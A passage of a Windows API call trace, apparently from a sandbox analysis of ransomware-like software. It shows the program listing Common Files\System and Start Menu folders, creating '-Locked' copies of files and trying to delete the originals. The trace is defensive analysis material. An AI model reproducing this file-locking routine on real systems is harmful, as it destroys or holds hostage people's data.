lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\System", lpFilePart=0x0) returned 0x2a [0299.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.586] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\System", lpFilePart=0x0) returned 0x2a [0299.586] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\System\\", lpFilePart=0x0) returned 0x2b [0299.586] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.589] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.589] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0299.589] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x512d296b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x512d296b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x512d296b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0299.590] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0299.590] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0299.591] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd2a0ad1, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd2a0ad1, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0299.591] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0a8cce, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0a8cce, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0a8cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0299.591] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0a8cce, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0a8cce, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0a8cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xeb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0299.592] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0299.592] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af164) returned 1 [0299.593] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System", nBufferLength=0x105, lpBuffer=0x1aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\System", lpFilePart=0x0) returned 0x2a [0299.593] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\", nBufferLength=0x105, lpBuffer=0x1aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\System\\", lpFilePart=0x0) returned 0x2b [0299.593] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\*", lpFindFileData=0x1aee8c | out: lpFindFileData=0x1aee8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.595] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.596] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0299.596] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x512d296b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x512d296b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x512d296b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0299.596] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0299.596] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadc", cAlternateFileName="")) returned 1 [0299.597] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd2a0ad1, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd2a0ad1, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0299.597] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0a8cce, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0a8cce, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0a8cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0299.597] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0a8cce, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0a8cce, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0a8cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xeb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 1 [0299.598] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee9c | out: lpFindFileData=0x1aee9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d0a8cce, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d0a8cce, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d0a8cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xeb800, dwReserved0=0x0, dwReserved1=0x0, cFileName="wab32res.dll", cAlternateFileName="")) returned 0 [0299.598] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af124) returned 1 [0299.603] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af130) returned 1 [0299.603] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll-Locked", nBufferLength=0x105, lpBuffer=0x1aeb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll-Locked", lpFilePart=0x0) returned 0x3e [0299.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af010) returned 1 [0299.603] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll-Locked" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.605] GetFileType (hFile=0x49c) returned 0x1 [0299.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af00c) returned 1 [0299.606] GetFileType (hFile=0x49c) returned 0x1 [0299.608] CloseHandle (hObject=0x49c) returned 1 [0299.609] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll", lpFilePart=0x0) returned 0x37 [0299.609] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\System\\DirectDB.dll" (normalized: "c:\\program files (x86)\\common files\\system\\directdb.dll")) returned 0 [0299.613] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", nBufferLength=0x105, lpBuffer=0x1aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", lpFilePart=0x0) returned 0x34 [0299.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af194) returned 1 [0299.613] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs", lpFilePart=0x0) returned 0x34 [0299.614] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", nBufferLength=0x105, lpBuffer=0x1aec70, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\", lpFilePart=0x0) returned 0x35 [0299.614] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\*.*", lpFindFileData=0x1aeebc | out: lpFindFileData=0x1aeebc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x32a4e933, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.614] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x98de5a53, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x32a4e933, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.615] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a26553, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32a26553, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32a26553, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Access 2016.lnk-Locked", cAlternateFileName="ACCESS~2.LNK")) returned 1 [0299.615] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36990d0, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36990d0, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessibility", cAlternateFileName="ACCESS~1")) returned 1 [0299.616] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Accessories", cAlternateFileName="ACCESS~2")) returned 1 [0299.616] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x7088bbcb, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x7088bbcb, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrative Tools", cAlternateFileName="ADMINI~1")) returned 1 [0299.616] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a3b0b5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32a3b0b5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32a3b0b5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0299.616] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x23bf23db, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x23bf23db, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x23bf23db, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x355, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0299.617] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a4d5a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32a4d5a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32a4d5a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk-Locked", cAlternateFileName="DESKTO~1.LNK")) returned 1 [0299.617] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x895, dwReserved0=0x0, dwReserved1=0x0, cFileName="Devices Flow.lnk", cAlternateFileName="")) returned 1 [0299.617] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c425ce, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x91c425ce, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x91c73351, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x99d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel 2016.lnk", cAlternateFileName="EXCEL2~1.LNK")) returned 1 [0299.618] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x503ebe79, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x503ebe79, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x503ebe79, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x92d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Immersive Control Panel.lnk", cAlternateFileName="")) returned 1 [0299.618] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x36e5585, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x36e5585, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Maintenance", cAlternateFileName="MAINTE~1")) returned 1 [0299.618] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91cbc61e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9833cf8e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9833cf8e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office 2016 Tools", cAlternateFileName="MICROS~1")) returned 1 [0299.619] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x1a440bee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a440bee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a440bee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="MiracastView.lnk", cAlternateFileName="")) returned 1 [0299.619] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9856516c, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9856516c, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x98566539, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9ec, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive for Business.lnk", cAlternateFileName="ONEDRI~1.LNK")) returned 1 [0299.619] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9875e8e4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9875e8e4, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x9875faea, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x989, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNote 2016.lnk", cAlternateFileName="ONENOT~1.LNK")) returned 1 [0299.619] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9887255b, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x9887255b, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x988738f2, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x997, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook 2016.lnk", cAlternateFileName="OUTLOO~1.LNK")) returned 1 [0299.619] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x989fca23, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x989fca23, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x989fde6b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x9c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint 2016.lnk", cAlternateFileName="POWERP~1.LNK")) returned 1 [0299.620] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x25, ftCreationTime.dwLowDateTime=0x502baba5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x502baba5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x502baba5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x897, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintDialog.lnk", cAlternateFileName="")) returned 1 [0299.620] FindNextFileW (in: 